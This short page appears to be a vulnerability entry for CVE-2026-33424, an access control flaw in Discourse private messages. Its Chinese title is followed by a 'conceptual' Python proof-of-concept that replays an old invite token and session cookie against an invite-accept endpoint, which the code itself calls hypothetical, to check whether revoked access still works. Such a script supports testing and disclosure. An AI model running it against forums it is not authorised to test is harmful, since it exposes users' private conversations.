CVE-2026-33424 Discourse 私信访问控制失效漏洞

# Conceptual PoC for CVE-2026-33424 import requests def test_invite_bypass(target_url, invite_token, session_cookie): """ Attempts to access a private message using an invite token after access should have been revoked. """ headers = { "Cookie": f"_forum_session={session_cookie}" } # Endpoint to accept invite (hypothetical endpoint based on description) url = f"{target_url}/invites/{invite_token}/accept" response = requests.post(url, headers=headers) if response.status_code == 200 and "access_granted" in response.text: print("[+] Vulnerability confirmed: Access granted via old invite token.") return True else: print("[-] Access denied or vulnerability patched.") return False # Usage # test_invite_bypass("http://target-discourse.com", "INVITE_TOKEN", "SESSION_COOKIE")